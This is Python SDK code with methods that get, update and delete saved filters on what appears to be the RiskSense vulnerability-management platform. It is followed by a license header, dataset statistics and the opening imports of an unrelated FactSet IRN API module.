client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_user_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved user filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.USER, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def update(self, filter_subject, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attributes
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
success = False
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
name = kwargs.get("name", None)
filter_definition = kwargs.get("filter_definition", None)
shared = kwargs.get("shared", None)
body = {
"name": name,
"filters": filter_definition,
"shared": shared
}
body = self._strip_nones_from_dict(body)
if body == {}:
raise ValueError("Body is empty. Please provide name, filter_definition, and/or shared")
try:
self.request_handler.make_request(ApiRequestHandler.PUT, url, body=body)
except (RequestFailed, StatusCodeError, MaxRetryError):
return success
success = True
return success
def update_application_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_appfinding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application findings filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_app_manual_exploit_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application manual exploit filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_application_url_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved application url filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.APPLICATION_URL, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_assessment_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved assessment filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.ASSESSMENT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_client_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved client filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.CLIENT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_database_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved database filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.DATABASE, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_databasefinding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved database finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.DATABASE_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_group_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved group filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.GROUP, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_host_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_hostfinding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_host_manual_exploit_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved host manual exploit filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_network_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved network filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.NETWORK, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_patch_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved patch filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.PATCH, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_tag_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved tag filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.TAG, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_unique_app_finding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved unique application finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_unique_host_finding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved unique host finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_user_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved user filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:keyword name: A new name for the filter. String.
:keyword filter_definition; A list of dicts containing the new filter parameters.
:keyword shared: True/false reflecting whether or not filter should be shared. Boolean
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.USER, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def delete(self, filter_subject, filter_id, client_id=None):
"""
Deletes a saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attribute
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
try:
self.request_handler.make_request(ApiRequestHandler.DELETE, url)
success = True
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return success
def delete_application_filter(self, filter_id, client_id=None):
"""
Delete a saved application filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_appfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved application finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_app_manual_exploit_filter(self, filter_id, client_id=None):
"""
Delete a saved application manual exploit filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_application_url_filter(self, filter_id, client_id=None):
"""
Delete a saved application URL filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_URL, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_assessment_filter(self, filter_id, client_id=None):
"""
Delete a saved assessment filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.ASSESSMENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_client_filter(self, filter_id, client_id=None):
"""
Delete a saved client filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.CLIENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_database_filter(self, filter_id, client_id=None):
"""
Delete a saved database filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.DATABASE, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_databasefinding_filter(self, filter_id, client_id=None):
"""
Delete a saved database finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.DATABASE_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_group_filter(self, filter_id, client_id=None):
"""
Delete a saved group filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.GROUP, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_host_filter(self, filter_id, client_id=None):
"""
Delete a saved host filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_hostfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved host finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_host_manual_exploit_filter(self, filter_id, client_id=None):
"""
Delete a saved host manual exploit filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_network_filter(self, filter_id, client_id=None):
"""
Delete a saved network filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.NETWORK, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_patch_filter(self, filter_id, client_id=None):
"""
Delete a saved patch filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.PATCH, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_tag_filter(self, filter_id, client_id=None):
"""
Delete a saved tag filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.TAG, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_unique_appfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved unique application finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_unique_hostfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved unique host finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_user_filter(self, filter_id, client_id=None):
"""
Delete a saved user filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.USER, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
"""
Copyright 2020 RiskSense, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| 36.403795
| 130
| 0.607652
| 12,157
| 109,357
| 5.294398
| 0.016945
| 0.108259
| 0.032472
| 0.027842
| 0.966627
| 0.965524
| 0.960786
| 0.952691
| 0.944239
| 0.941396
| 0
| 0.001498
| 0.328356
| 109,357
| 3,004
| 131
| 36.403795
| 0.874811
| 0.511911
| 0
| 0.71976
| 0
| 0
| 0.009784
| 0.001976
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117365
| false
| 0
| 0.003593
| 0
| 0.262275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc592f21ceebd8fc898ab4d82d0027cf015f6392
| 76,051
|
py
|
Python
|
code/python/IRNConfiguration/v1/fds/sdk/IRNConfiguration/api/custom_symbols___types_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/IRNConfiguration/v1/fds/sdk/IRNConfiguration/api/custom_symbols___types_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/IRNConfiguration/v1/fds/sdk/IRNConfiguration/api/custom_symbols___types_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
IRN API v1
Allows users to extract, create, update and configure IRN data. # noqa: E501
The version of the OpenAPI document: 1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.IRNConfiguration.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.IRNConfiguration.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
